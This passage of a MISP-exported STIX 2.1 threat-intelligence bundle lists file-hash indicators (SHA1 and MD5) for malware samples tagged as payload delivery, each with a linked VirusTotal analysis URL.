|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db814e-8084-479f-95e5-43a602de0b81",
|
|
"value": "https://www.virustotal.com/file/bfdad4010fb8104881c0392ff3d60e43e9eee73a7f8d00ab2097898dcfc14710/analysis/1479809207/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db814f-a84c-4cfc-94bd-4fd702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:35.000Z",
|
|
"modified": "2017-03-29T09:41:35.000Z",
|
|
"description": "sample - Xchecked via VT: e3d368a3e613f27cfd17db2ed439b6980f9bf0d10458d25066e316e4193c5d18",
|
|
"pattern": "[file:hashes.SHA1 = 'bad01765b329edea7fd4a7ea882dde018bc79409']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db814f-f45c-45b2-90de-4c5002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:35.000Z",
|
|
"modified": "2017-03-29T09:41:35.000Z",
|
|
"description": "sample - Xchecked via VT: e3d368a3e613f27cfd17db2ed439b6980f9bf0d10458d25066e316e4193c5d18",
|
|
"pattern": "[file:hashes.MD5 = '1e93fecb7d7bff508e57875b9d2070e1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8150-b26c-47c4-b734-4e6002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:36.000Z",
|
|
"modified": "2017-03-29T09:41:36.000Z",
|
|
"first_observed": "2017-03-29T09:41:36Z",
|
|
"last_observed": "2017-03-29T09:41:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8150-b26c-47c4-b734-4e6002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8150-b26c-47c4-b734-4e6002de0b81",
|
|
"value": "https://www.virustotal.com/file/e3d368a3e613f27cfd17db2ed439b6980f9bf0d10458d25066e316e4193c5d18/analysis/1476961536/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8151-d750-4ce3-95f6-435f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:37.000Z",
|
|
"modified": "2017-03-29T09:41:37.000Z",
|
|
"description": "sample - Xchecked via VT: 7c324b8b01db025d627df826283af003f54d2d5f20d6d52bee380a69a1fcd9d4",
|
|
"pattern": "[file:hashes.SHA1 = '4ff40beae38c1c39aa7cb3647f70e5dd102f5ea1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8152-b790-4d35-b785-405602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:38.000Z",
|
|
"modified": "2017-03-29T09:41:38.000Z",
|
|
"description": "sample - Xchecked via VT: 7c324b8b01db025d627df826283af003f54d2d5f20d6d52bee380a69a1fcd9d4",
|
|
"pattern": "[file:hashes.MD5 = 'bb34f2ab13762a095c15318fbd93b010']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8153-2790-44bb-ad3a-49bd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:39.000Z",
|
|
"modified": "2017-03-29T09:41:39.000Z",
|
|
"first_observed": "2017-03-29T09:41:39Z",
|
|
"last_observed": "2017-03-29T09:41:39Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8153-2790-44bb-ad3a-49bd02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8153-2790-44bb-ad3a-49bd02de0b81",
|
|
"value": "https://www.virustotal.com/file/7c324b8b01db025d627df826283af003f54d2d5f20d6d52bee380a69a1fcd9d4/analysis/1475947442/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8154-73c8-4ef6-b5ae-44e902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:40.000Z",
|
|
"modified": "2017-03-29T09:41:40.000Z",
|
|
"description": "sample - Xchecked via VT: b5a785aa5284b96f08e9b191b3c1259d13e478523504486a24191b6e239b74e2",
|
|
"pattern": "[file:hashes.SHA1 = '9644e1066ac0ae28a43698a3f850d94d3fa880a6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8155-0cec-4890-b51b-4c4602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:41.000Z",
|
|
"modified": "2017-03-29T09:41:41.000Z",
|
|
"description": "sample - Xchecked via VT: b5a785aa5284b96f08e9b191b3c1259d13e478523504486a24191b6e239b74e2",
|
|
"pattern": "[file:hashes.MD5 = 'dd14c8758544e90104586369ce28a75b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8156-d5e8-41f3-bce0-4d4302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:42.000Z",
|
|
"modified": "2017-03-29T09:41:42.000Z",
|
|
"first_observed": "2017-03-29T09:41:42Z",
|
|
"last_observed": "2017-03-29T09:41:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8156-d5e8-41f3-bce0-4d4302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8156-d5e8-41f3-bce0-4d4302de0b81",
|
|
"value": "https://www.virustotal.com/file/b5a785aa5284b96f08e9b191b3c1259d13e478523504486a24191b6e239b74e2/analysis/1434468191/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8157-0544-4c9e-a5ec-446802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:43.000Z",
|
|
"modified": "2017-03-29T09:41:43.000Z",
|
|
"description": "sample - Xchecked via VT: 03307e8bbbdceaa8393cdd13fd854d2705b5bfdf211b40a53113b915debbfc02",
|
|
"pattern": "[file:hashes.SHA1 = '8bddf586aa183082b7c5e5925482c0cd51806454']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8158-c3e4-469a-b3cb-4c9f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:44.000Z",
|
|
"modified": "2017-03-29T09:41:44.000Z",
|
|
"description": "sample - Xchecked via VT: 03307e8bbbdceaa8393cdd13fd854d2705b5bfdf211b40a53113b915debbfc02",
|
|
"pattern": "[file:hashes.MD5 = '1435c98df5144d8ba41b36b45772a965']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8159-c2c4-4641-a99c-4f7e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:45.000Z",
|
|
"modified": "2017-03-29T09:41:45.000Z",
|
|
"first_observed": "2017-03-29T09:41:45Z",
|
|
"last_observed": "2017-03-29T09:41:45Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8159-c2c4-4641-a99c-4f7e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8159-c2c4-4641-a99c-4f7e02de0b81",
|
|
"value": "https://www.virustotal.com/file/03307e8bbbdceaa8393cdd13fd854d2705b5bfdf211b40a53113b915debbfc02/analysis/1423568870/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db815a-4ecc-4fee-b3fd-454202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:46.000Z",
|
|
"modified": "2017-03-29T09:41:46.000Z",
|
|
"description": "sample - Xchecked via VT: e701fa1b68a80e77863e06de17a19a2f489aefe8af8b47bc0d908c726eb41053",
|
|
"pattern": "[file:hashes.SHA1 = 'fe3bca0f65ef837da5f9f7ee322590f96cd9cb08']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db815a-fb78-4d7a-a487-4b1302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:46.000Z",
|
|
"modified": "2017-03-29T09:41:46.000Z",
|
|
"description": "sample - Xchecked via VT: e701fa1b68a80e77863e06de17a19a2f489aefe8af8b47bc0d908c726eb41053",
|
|
"pattern": "[file:hashes.MD5 = '92395b7c54e74c6f6ecff12f128ad825']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db815b-a5fc-4e91-969d-423202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:47.000Z",
|
|
"modified": "2017-03-29T09:41:47.000Z",
|
|
"first_observed": "2017-03-29T09:41:47Z",
|
|
"last_observed": "2017-03-29T09:41:47Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db815b-a5fc-4e91-969d-423202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db815b-a5fc-4e91-969d-423202de0b81",
|
|
"value": "https://www.virustotal.com/file/e701fa1b68a80e77863e06de17a19a2f489aefe8af8b47bc0d908c726eb41053/analysis/1434545440/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db815c-6050-47fe-93c0-48a702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:48.000Z",
|
|
"modified": "2017-03-29T09:41:48.000Z",
|
|
"description": "sample - Xchecked via VT: f1af98d63fec8e0164aa6bac58c680c80075545aabdbdc49ef9cb45694d14642",
|
|
"pattern": "[file:hashes.SHA1 = 'd71440004c5f75a36c4d25a334b93a5b62aa8a0c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db815d-a808-4fd2-a50b-424e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:49.000Z",
|
|
"modified": "2017-03-29T09:41:49.000Z",
|
|
"description": "sample - Xchecked via VT: f1af98d63fec8e0164aa6bac58c680c80075545aabdbdc49ef9cb45694d14642",
|
|
"pattern": "[file:hashes.MD5 = '7ad0b9156970f5156247691250f8ad89']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db815e-0ddc-422b-86dc-45df02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:50.000Z",
|
|
"modified": "2017-03-29T09:41:50.000Z",
|
|
"first_observed": "2017-03-29T09:41:50Z",
|
|
"last_observed": "2017-03-29T09:41:50Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db815e-0ddc-422b-86dc-45df02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db815e-0ddc-422b-86dc-45df02de0b81",
|
|
"value": "https://www.virustotal.com/file/f1af98d63fec8e0164aa6bac58c680c80075545aabdbdc49ef9cb45694d14642/analysis/1436260375/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db815f-8be4-43ab-8e33-495502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:51.000Z",
|
|
"modified": "2017-03-29T09:41:51.000Z",
|
|
"description": "sample - Xchecked via VT: f66536dff13b1ba415bd4c5fc172632465d33cc388899e976a49380da5620e45",
|
|
"pattern": "[file:hashes.SHA1 = 'c843aaf9afcc3a0be8f150b788f32ced7f5c1e17']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8160-814c-4373-89af-424b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:52.000Z",
|
|
"modified": "2017-03-29T09:41:52.000Z",
|
|
"description": "sample - Xchecked via VT: f66536dff13b1ba415bd4c5fc172632465d33cc388899e976a49380da5620e45",
|
|
"pattern": "[file:hashes.MD5 = '5ccbc76921599c17f4bb4e83a429f071']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8161-3720-4ca4-a64d-4ecc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:53.000Z",
|
|
"modified": "2017-03-29T09:41:53.000Z",
|
|
"first_observed": "2017-03-29T09:41:53Z",
|
|
"last_observed": "2017-03-29T09:41:53Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8161-3720-4ca4-a64d-4ecc02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8161-3720-4ca4-a64d-4ecc02de0b81",
|
|
"value": "https://www.virustotal.com/file/f66536dff13b1ba415bd4c5fc172632465d33cc388899e976a49380da5620e45/analysis/1436210513/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8162-692c-4c6c-86af-451602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:54.000Z",
|
|
"modified": "2017-03-29T09:41:54.000Z",
|
|
"description": "sample - Xchecked via VT: e911e6e631d26b2f93779868d4b20224b2bfde798f2d42cb9870d951f4f10c53",
|
|
"pattern": "[file:hashes.SHA1 = '2a6dd3ea072667aabe3199b56ef8c9a10ab3b135']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8163-1f94-4eb0-907f-4d8f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:55.000Z",
|
|
"modified": "2017-03-29T09:41:55.000Z",
|
|
"description": "sample - Xchecked via VT: e911e6e631d26b2f93779868d4b20224b2bfde798f2d42cb9870d951f4f10c53",
|
|
"pattern": "[file:hashes.MD5 = '39d77307d7afd0452628d4c891f0f969']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8164-fad4-4860-b414-4c5e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:56.000Z",
|
|
"modified": "2017-03-29T09:41:56.000Z",
|
|
"first_observed": "2017-03-29T09:41:56Z",
|
|
"last_observed": "2017-03-29T09:41:56Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8164-fad4-4860-b414-4c5e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8164-fad4-4860-b414-4c5e02de0b81",
|
|
"value": "https://www.virustotal.com/file/e911e6e631d26b2f93779868d4b20224b2bfde798f2d42cb9870d951f4f10c53/analysis/1490612674/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8165-b018-4a0d-889f-4bb202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:57.000Z",
|
|
"modified": "2017-03-29T09:41:57.000Z",
|
|
"description": "sample - Xchecked via VT: 45c3824018e889e8fb006a83386a1e459b563cf9db1546f49c4bbc5faa9ea74e",
|
|
"pattern": "[file:hashes.SHA1 = 'd37f0338ef211f276fb0fdd3f5dcf49f5bda8684']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8166-a2b8-4c05-8cd7-482c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:58.000Z",
|
|
"modified": "2017-03-29T09:41:58.000Z",
|
|
"description": "sample - Xchecked via VT: 45c3824018e889e8fb006a83386a1e459b563cf9db1546f49c4bbc5faa9ea74e",
|
|
"pattern": "[file:hashes.MD5 = '7cc8c38de25c216768ad775a9fbb41c0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8167-9f90-49a8-8c55-44fd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:59.000Z",
|
|
"modified": "2017-03-29T09:41:59.000Z",
|
|
"first_observed": "2017-03-29T09:41:59Z",
|
|
"last_observed": "2017-03-29T09:41:59Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8167-9f90-49a8-8c55-44fd02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8167-9f90-49a8-8c55-44fd02de0b81",
|
|
"value": "https://www.virustotal.com/file/45c3824018e889e8fb006a83386a1e459b563cf9db1546f49c4bbc5faa9ea74e/analysis/1442575476/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8168-0310-4ed8-9352-43d902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:00.000Z",
|
|
"modified": "2017-03-29T09:42:00.000Z",
|
|
"description": "sample - Xchecked via VT: a1f766bbb2beae7a1211003e3b3e63f006ed28a1b7fb2e1549af1ffa2f0f477b",
|
|
"pattern": "[file:hashes.SHA1 = 'd73da08ce3bf2375f6b05d8e660987b6a7e881e4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8169-d260-4a53-8590-4acf02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:01.000Z",
|
|
"modified": "2017-03-29T09:42:01.000Z",
|
|
"description": "sample - Xchecked via VT: a1f766bbb2beae7a1211003e3b3e63f006ed28a1b7fb2e1549af1ffa2f0f477b",
|
|
"pattern": "[file:hashes.MD5 = 'd0ff673000c398756fcc7a9f3f5861c8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db816a-0edc-4df3-a45e-475802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:02.000Z",
|
|
"modified": "2017-03-29T09:42:02.000Z",
|
|
"first_observed": "2017-03-29T09:42:02Z",
|
|
"last_observed": "2017-03-29T09:42:02Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db816a-0edc-4df3-a45e-475802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
